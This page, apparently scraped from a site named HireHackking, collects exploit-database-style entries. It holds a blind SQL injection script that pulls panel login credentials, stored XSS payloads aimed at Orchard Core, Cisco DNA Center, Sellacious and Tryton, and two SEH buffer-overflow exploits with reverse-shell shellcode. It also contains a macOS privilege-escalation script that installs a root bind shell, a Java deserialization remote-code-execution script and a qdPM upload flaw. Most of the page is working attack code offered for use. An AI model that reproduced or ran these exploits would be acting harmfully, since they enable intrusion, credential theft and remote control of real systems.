HireHackking

import requests import time import sys wait_delay = 5 #Depending on connection delay and server speed, you may need to make this a larger number KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a' #lol no integrity verification PostData = "" def rc4_crypt(data , key): S = list(range(256)) j = 0 out = [] for i in range(256): j = (j + S[i] + ord( key[i % len(key)] )) % 256 S[i] , S[j] = S[j] , S[i] i = j = 0 for char in data: i = ( i + 1 ) % 256 j = ( j + S[i] ) % 256 S[i] , S[j] = S[j] , S[i] out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256])) return ''.join(out) def brute_length(url, id): for i in range(0, 30): Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay) ConnectUrl = url + '?i=' + Injection start = time.time() r = requests.post(ConnectUrl, data=PostData, headers='') end = time.time() if((end - start) >= wait_delay): return i return 0 def brute_char(url, position, id): sys.stdout.write(" ") sys.stdout.flush() for i in range(32, 127): Injection = "\"', (IF(SUBSTRING((SELECT value FROM settings WHERE id='%d'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, position, i, wait_delay) ConnectUrl = url + '?i=' + Injection sys.stdout.write("\b%c" % chr(i)) sys.stdout.flush() start = time.time() r = requests.post(ConnectUrl, data=PostData, headers='') end = time.time() if((end - start) >= wait_delay): break def brute_panel(url): global KnockString, PostData PostData = 'aaaa' + rc4_crypt(KnockString, 'aaaa') print"Username: ",; sys.stdout.flush() ulen = brute_length(url, 1) for i in range(1, ulen+1): brute_char(url, i, 1) print"\nPassword: ", sys.stdout.flush() plen = brute_length(url, 2) for i in range(1, plen+1): brute_char(url, i, 2) print"" if(len(sys.argv) >= 2): brute_panel(sys.argv[1]) else: print("enter panel gate url")

# Exploit Title: Orchard Core RC1 - Persistent Cross-Site Scripting # Google Dork: "Orchardcms" # Date: 2020-05-07 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: http://www.orchardcore.net/ # Software Link: https://github.com/OrchardCMS/OrchardCore # Version: RC1 # Tested on: Windows # CVE : N/A ### Vulnerability : Persistent Cross-Site Scripting ###Describe the bug Persistent Cross-site scripting (Stored XSS) vulnerabilities in Orchard CMS - Orchard Core RC1 allow remote attackers to inject arbitrary web script or HTML via create or edit blog content. ###To Reproduce Steps to reproduce the behavior: POST /Admin/Contents/ContentTypes/BlogPost/Create HTTP/1.1 -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="ListPart.ContainerId" 4s5x3fv3qpsh7rwzvy069ykbxn -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="TitlePart.Title" Test XSS -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="AutoroutePart.Path" -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="BlogPost.Subtitle.Text" -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="MarkdownBodyPart.Source" <script>alert(document.cookie)</script> -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="submit.Publish" submit.Publish -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="__RequestVerificationToken" xxx -----------------------------31063090348194141451329743365-- ###Reference: https://github.com/OrchardCMS/OrchardCore/issues/5802 ### History ============= 2020-03-23 Issue discovered 2020-03-27 Vendor contacted 2020-04-22 Vendor response and hotfix 2020-04-22 Vendor set patch milestone to rc2

# Exploit Title: qdPM 9.1 - Arbitrary File Upload # Date: 2020-05-06 # Author: Besim ALTINOK # Vendor Homepage: https://sourceforge.net/projects/qdpm/ # Software Link: https://sourceforge.net/projects/qdpm/ # Version: v9.1 (Maybe it affect other versions) # Tested on: Xampp # Credit: İsmail BOZKURT # Remotely: Yes Description -------------------------------------------------------------------- When a normal user tries to update their profile, they can arbitrarily upload files to the user_photo area. Because there are no file extension controls. Additionally, the .htaccess file has some protection against malicious .php file. But, the developer writes the wrong regex. So, the Attacker can change extension as (.PHP) and run code on the server .htaccess file content: ---------------------------------------------- # This is used to restrict access to this folder to anything other # than images # Prevents any script files from being accessed from the images folder <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"> Order Deny,Allow Deny from all </FilesMatch> Vulnerable File-1: actions.class.php ---------------------------------------------- Vulnerable function: processForm --------------------------------------------- Vulnerable area: --------------------------------------------- <?php protected function processForm(sfWebRequest $request, sfForm $form) { $files = $request->getFiles(); $userPhoto = $files['users']['photo']['name']; $form->bind($request->getParameter($form->getName()), $request->getFiles($form->getName())); if ($form->isValid()) { $user = $this->getUser()->getAttribute('user'); $this->checkUser($form['email']->getValue(),$user->getId()); $form->setFieldValue('users_group_id',$user->getUsersGroupId()); $form->setFieldValue('active',$user->getActive()); $hasher = new PasswordHash(11, false); if(isset($form['new_password'])) { if(strlen($form['new_password']->getValue())>0) { $form->setFieldValue('password', $hasher->HashPassword($form['new_password']->getValue())); } } if(strlen($userPhoto)>0) { $userPhoto = rand(111111,999999) . '-' . $userPhoto; $filename = sfConfig::get('sf_upload_dir') . '/users/' . $userPhoto; move_uploaded_file($files['users']['photo']['tmp_name'], $filename); $form->setFieldValue('photo', $userPhoto); app::image_resize($filename,$filename); } else { $form->setFieldValue('photo', $form['photo_preview']->getValue()); } ?>

# Exploit Title: LanSend 3.2 - Buffer Overflow (SEH) # Exploit Author: gurbanli # Date: 2020-05-12 # Vulnerable Software: LanSend 3.2 # Vendor Homepage: https://lizardsystems.com # Version: 3.2 # Software Link: https://lizardsystems.com/download/lansend_setup.exe # Tested on: Windows 7 x86 f = file('payload.txt','w') """ PoC 1. Run exploit 2. Run Lansend and Click Add Computers Wizard 3. Choose import computers from file 4. Copy/paste payload.txt content into filename section 5. shellcode will be executed """ """ msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' """ shellcode = b"" shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf" shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17" shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b" shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa" shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89" shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92" shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c" shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1" shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9" shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae" shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01" shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7" shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b" shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59" shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a" shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a" shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6" shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14" shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98" shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda" shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32" shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc" shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75" shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52" shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b" shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8" shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a" shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b" shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f" shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e" shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c" shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7" """ 047FFF09 59 POP ECX 047FFF0A 59 POP ECX 047FFF0B 80C1 64 ADD CL,64 047FFF0E ^FFE1 JMP ECX """ jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1' """ppr 00417a47""" payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x47\x7a\x41' f.write(payload) f.close()

# Exploit Title: Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting # Date: 2020-04-16 # Exploit Author: Dylan Garnaud & Benoit Malaboeuf - Pentesters from Orange Cyberdefense France # Vendor Homepage: https://www.cisco.com/c/en/us/products/cloud-systems-management/dna-center/index.html # Version: Cisco DNA before 1.3.0.6 and 1.3.1.4 # Tested on: 1.3.0.2 # CVE : CVE-2019-15253 # Security advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190205-dnac-xss ## 1 - Network Hierarchy - Vulnerable parameter: Floor Name. - Payload: ```<script>alert('XSS')</script>``` - Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered. - Privileges: It requires admin or customer account. - Location: Design -> Network Hirearchy -> Building -> Floor -> Field: "Floor name" . ## 2 - User Management - Vulnerable parameters: First Name, Last Name . - Payload: ```<script>alert('XSS')</script>``` - Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered. - Privileges: It requires admin account. - Location: Settings -> Users -> User Management -> Fields: "First Name" or "Last Name".

# Exploit Title: MacOS 320.whatis Script - Privilege Escalation # Date: 2020-05-06 # Exploit Author: Csaba Fitzl # Vendor Homepage: https://support.apple.com/en-us/HT210722 # Version: macOS < 10.15.1 # Tested on: macOS # CVE : CVE-2019-8802 import sys import os man_file_content = """ .TH exploit 1 "August 16 2019" "Csaba Fitzl" .SH NAME exploit \- --> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>Label</key><string>com.sample.Load</string><key>ProgramArguments</key><array> <string>/Applications/Scripts/sample.sh</string></array><key>RunAtLoad</key><true/></dict></plist><!-- """ sh_quick_content = """ /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal """ sh_reboot_content = """ python /Applications/Scripts/bind.py """ python_bind_content = """ #!/usr/bin/python2 import os import pty import socket lport = 31337 def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', lport)) s.listen(1) (rem, addr) = s.accept() os.dup2(rem.fileno(),0) os.dup2(rem.fileno(),1) os.dup2(rem.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close() if __name__ == "__main__": main() """ def create_man_file(): print("[i] Creating bogus man page: /usr/local/share/man/man1/<!--exploit.1") f = open('/usr/local/share/man/man1/<!--exploit.1','w') f.write(man_file_content) f.close() def create_symlink(): print("[i] Creating symlink in /usr/local/share/man/") os.system('ln -s /Library/LaunchDaemons/com.sample.Load.plist /usr/local/share/man/whatis.tmp') def create_scripts_dir(): print("[i] Creating /Applications/Scripts directory") os.system('mkdir /Applications/Scripts') def create_quick_scripts(): create_scripts_dir() print("[i] Creating script file to be called by LaunchDaemon") f = open('/Applications/Scripts/sample.sh','w') f.write(sh_quick_content) f.close() os.system('chmod +x /Applications/Scripts/sample.sh') def create_reboot_scripts(): create_scripts_dir() print("[i] Creating script file to be called by LaunchDaemon") f = open('/Applications/Scripts/sample.sh','w') f.write(sh_reboot_content) f.close() os.system('chmod +x /Applications/Scripts/sample.sh') print("[i] Creating python script for bind shell") f = open('/Applications/Scripts/bind.py','w') f.write(python_bind_content) f.close() def rename_man_pages(): for root, dirs, files in os.walk("/usr/local/share/man"): for file in files: if file[0] in "0123456789": #if filename begins with a number old_file = os.path.join(root, file) new_file = os.path.join(root, 'a' + file) os.rename(old_file, new_file) #rename with adding a prefix print("[i] Renaming: " + os.path.join(root, file)) def main(): if len(sys.argv) != 2 : print "[-] Usage: python makewhatis_exploit.py [quick|reboot]" sys.exit (1) if sys.argv[1] == 'quick': create_man_file() create_symlink() create_quick_scripts() rename_man_pages() print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] and then simulate a boot load with: \nsudo launchctl load com.sample.Load.plist" elif sys.argv[1] == 'reboot': create_man_file() create_symlink() create_reboot_scripts() rename_man_pages() print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] reboot macOS or run `sudo launchctl load com.sample.Load.plist` and connect to your root shell via:\nnc 127.1 31337" else: print "[-] Invalid arguments" print "[-] Usage: python makewhatis_exploit.py [quick|reboot]" if __name__== "__main__": main()

# Exploit Title: TylerTech Eagle 2018.3.11 - Remote Code Execution # Date: 2019-10-08 # Exploit Author: Anthony Cole # Vendor Homepage: https://www.tylertech.com/products/eagle # Version: 2018.3.11 # Tested on: Windows 2012 # CVE: CVE-2019-16112 # Category: webapps # # Eagle is a software written in Java by TylerTech. Version 2018.3.11 allows an unauthenticated attacker to cause the software to deserialize untrusted data that can result in remote code execution. # /recorder/ServiceManager in TylerTech Eagle 2018.3.11 is vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the tomcat service that is running the application. # import sys, requests, zlib, argparse, urlparse, subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def run_command(command): p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True) output = b'' for line in iter(p.stdout.readline, b''): output += line return output def isurl(urlstr): try: urlparse.urlparse(urlstr) return urlstr except: raise argparse.ArgumentTypeError("invalid url") if __name__ == "__main__": parser = argparse.ArgumentParser(description='Java Deserialization Exlpoit') parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.") parser.add_argument("--cmd", "-c", required=True, help="the command to execute") parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.jar") parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080") args = parser.parse_args() url_parts = urlparse.urlparse(args.url) target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc) proxies = {} if(args.proxy != None): proxy_parts = urlparse.urlparse(args.proxy) proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc) cmd = args.cmd serial_payload = run_command('java -jar %s CommonsCollections6 "%s"' % (args.ysoserial, args.cmd)) url = target_url + "/recorder/ServiceManager?service=tyler.empire.settings.SettingManager" headers = {'Content-Type': 'application/octet-stream'} payload = zlib.compress(serial_payload) response = requests.post(url, data=payload, proxies=proxies, verify=False)

# Exploit Title: Complaint Management System 1.0 - 'username' SQL Injection # Exploit Author: Daniel Ortiz # Date: 2020-05-12 # Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html # Tested on: XAMPP Version 5.6.40 / Windows 10 # Software Link: https://www.sourcecodester.com/php/14206/complaint-management-system.html #!/usr/bin/python import sys import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning) def main(): target = sys.argv[1] payload = "ADMIN' UNION SELECT NULL,NULL,NULL,SLEEP(5)#" url = "http://%s/cms/admin/index.php" % target print("[+] Target: %s") % target print("[+] Injecting payload: %s") % payload inject(url, payload) def inject(url, payload): s = requests.Session() d = {'username': payload, 'password': 'admin', 'submit': ''} r = s.post(url, data=d, proxies=proxy) if __name__ == '__main__': if len(sys.argv) != 2: print("(-) usage: %s TARGET" % sys.argv[0]) print("(-) e.g: %s 192.168.0.10" % sys.argv[0]) sys.exit(-1) main()

# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting # Exploit Author: gurbanli # Date: 2020-05-13 # Vendor Homepage: https://www.sellacious.com # Version: 4.6 # Software Link: https://www.sellacious.com/free-open-source-ecommerce-software Document Title: =============== Sellacious eCommerce - Multiple Persistent Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2226 Common Vulnerability Scoring System: ==================================== 4.6 Product & Service Introduction: =============================== https://www.sellacious.com/free-open-source-ecommerce-software Vulnerability Disclosure Timeline: ================================== 2020-05-08: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Sellacious eCommerce Shop CMS (2020 Q1). The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The cross site web vulnerabilities are located in the all the adress input fields of the `Manage Your Addresses` module. Remote attackers are able to register a low privilege user account to inject own malicious script code to the adress information page. The execution of the script code occurs each time the adress information is used in the web ui of the ecommerce application. The request method to inject is POST and the attack vector is persistent on the application-side. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Manage Your Addresses Vulnerable Input(s): [+] Full name [+] First name [+] Middle name [+] Last name [+] Company [+] PO Box [+] Address [+] Landmark Affected(s): [+] index.php/manage-your-addresses [+] Backend user adress information listing Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with user account and low user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Exploitation <iframe src="evil.source" onload=alert(document.cookie)> <iframe src="evil.source" onload=alert(document.domain)> PoC: Vulnerable Source <div class="addresses-container"> <div class="address-heading"> <h2>Your addresses <a href="#address-form-0" role="button" data-toggle="ctech-modal" class="ctech-mb-3 btn-add-address ctech-float-right ctech-text-primary"> <i class="fa fa-plus"></i> <span class="add-address-text">Add New Address</span></a></h2></div> <div id="addresses" class="cart-aio ctech-text-center"> <div id="address-editor"> <ul id="address-items" data-original-title="" title=""> <li class="address-item" id="address-item-9"> <div class="ctech-float-right address-action"> <button type="button" class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip remove-address" data-placement="bottom" data-id="9" title="" data-original-title="Delete"><i class="fa fa-trash-alt"></i></button> <a href="#address-form-9" role="button" data-toggle="ctech-modal" data-placement="bottom" class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip" title="" data-original-title="Edit"><i class="fa fa-edit"></i></a> </div> <div class="address-content"> <span class="address_name">>"<iframe src="evil.source"></span> <span class="address_company">>"<iframe src="evil.source"></span> <span class="address_po_box">PO #: >"<iframe src="evil.source"></span> <span class="address_address has-comma">>"<iframe src="evil.source"></span> <span class="address_landmark has-comma">>"<iframe src="evil.source"></span> <span class="address_country">United States</span> <div class="cart_address_box w100p"> <div class="cart_address_buttons"> </div> </div> </div> </li> <li class="address-item odd-address-item"> <a href="#address-form-0" role="button" data-toggle="ctech-modal" class="btn-new-address"><i class="fa fa-plus"></i></a> </li> </iframe></span></div></li></ul> <div class="ctech-wrapper"> </div><div class="ctech-clearfix"></div> </div><div class="ctech-clearfix"></div> </div></div> Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Tryton 5.4 - Persistent Cross-Site Scripting # Exploit Author: Vulnerability-Lab # Date: 2020-05-13 # Vendor Homepage: https://www.tryton.org/ # Version: 5.4 # Software Link: https://www.tryton.org/download Document Title: =============== Tryton v5.4 - (Name) Persistent Cross Site Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2233 Common Vulnerability Scoring System: ==================================== 4.4 Product & Service Introduction: =============================== https://www.tryton.org/ & https://www.tryton.org/download Affected Product(s): ==================== Tryton Foundation Product: Tryton v5.4 - CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-12: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Tryton v5.4 web-application series. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `name` parameter of the `User Profile` module. Remote attackers with low privileges are able to inject own malicious persistent script code as name for user accounts. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. Injection point is the profile input field with the name value and the execute occurs in the front ui on top right were the avatar is listed or in the admin backend on the res.user;name="Users"&views. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] User Profile Vulnerable Input(s): [+] Name Vulnerable Parameter(s): [+] name Affected Module(s): [+] /index [+] /model/res.user;name="Users"&views (backend) Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by low privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the application and login to your low privileged user account 2. Move to the profile on top right side (click) 3. Inject test payload to the "Name" input field and save the entry 4. Execution occurs after save on top right and /model/res.user;name="Users"&views of the admin backend 5. Successful reproduce of the persistent cross site vulnerability! PoC: Payload %20>"><img%20src="evil.source%20onload=alert(document.cookie)> PoC: Vulnerable Source (Execution Point) <div class="input-group input-group-sm"><span class="input-group-btn"><button type="button" class="btn btn-default">Filters</button></span> <input class="form-control mousetrap" placeholder="Search" autocomplete="off" list="ui-id-3"><datalist id="ui-id-3"></datalist> <span class="input-group-btn"><button type="button" class="btn btn-default hidden-md hidden-lg" aria-label="Clear Search" title="Clear Search" style="display: none;"><img class="icon" src="blob:https://tryton.localhost:8080/4672612e-3ec6-4bd1-aa4d-bd379bd89c04"></button> <button type="submit" class="btn btn-default" aria-label="Search" title="Search"><img class="icon" src="blob:https://demo5.4.tryton.org/ab0d098c-1302-4ffa-8f27-3204fb244082"></button><button class="btn btn-default hidden-xs" type="button" title="Bookmark this filter" aria-label="Bookmark this filter"><img class="icon" aria-hidden="true" src="blob:https://demo5.4.tryton.org/d97b8af2-ca4b-48e2-a40e-a772955d7ea8"></button><button type="button" class="btn btn-default dropdown-toggle" data-toggle="dropdown" aria-expanded="false" aria-label="Bookmarks" title="Bookmarks" id="bookmarks" disabled=""> <img aria-hidden="true" class="icon" src="blob:https://demo5.4.tryton.org/c9b2efdd-1ec8-4785-b7a0-d3b8dcb6d7e9"></button> <ul class="dropdown-menu dropdown-menu-right" role="menu" aria-labelledby="bookmarks"></ul><button type="button" class="btn btn-default hidden-xs" aria-expanded="false" aria-label="Show inactive records" title="Show inactive records"> <img aria-hidden="true" class="icon" src="blob:https://demo5.4.tryton.org/6ad6ad9c-4d17-4592-9e3c-6f698b6f9a27"></button></span></div> --- PoC Session Logs [POST] --- https://tryton.localhost:8080/tryton/ Host: tryton.localhost:8080 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/json Authorization: Session ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM= X-Requested-With: XMLHttpRequest Content-Length: 527 Origin: https://tryton.localhost:8080 Connection: keep-alive Referer: https://tryton.localhost:8080/ {"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>"><img%20src="evil.source%20onload=alert(document.cookie)>">", "signature":"test signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1, "company.rec_name":"Michael Scott Paper Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10], "locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time": {"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]} - POST: HTTP/2.0 200 OK server: nginx/1.16.1 content-type: application/json access-control-allow-origin: https://tryton.localhost:8080 vary: Origin content-encoding: gzip Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH) # Exploit Author: gurbanli # Date: 2020-05-12 # Vulnerable Software: Remote Desktop Audit 2.3.0.157 # Vendor Homepage: https://lizardsystems.com # Version: 2.3.0.157 # Software Link: https://lizardsystems.com/download/rdaudit_setup.exe # Tested on: Windows 7 x86 f = file('payload.txt','w') """ Same with LanSend 3.2, but with different ppr address. PoC 1. Run exploit 2. Run Remote Desktop Audit and Click Add Computers Wizard 3. Choose import computers from file 4. Copy/paste payload.txt content into filename section 5. shellcode will be executed """ """ msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' """ shellcode = b"" shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf" shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17" shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b" shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa" shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89" shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92" shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c" shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1" shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9" shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae" shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01" shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7" shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b" shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59" shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a" shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a" shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6" shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14" shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98" shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda" shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32" shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc" shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75" shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52" shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b" shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8" shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a" shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b" shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f" shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e" shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c" shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7" """ 047FFF09 59 POP ECX 047FFF0A 59 POP ECX 047FFF0B 80C1 64 ADD CL,64 047FFF0E ^FFE1 JMP ECX """ jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1' """ppr 00418230""" payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x30\x82\x41' f.write(payload) f.close()

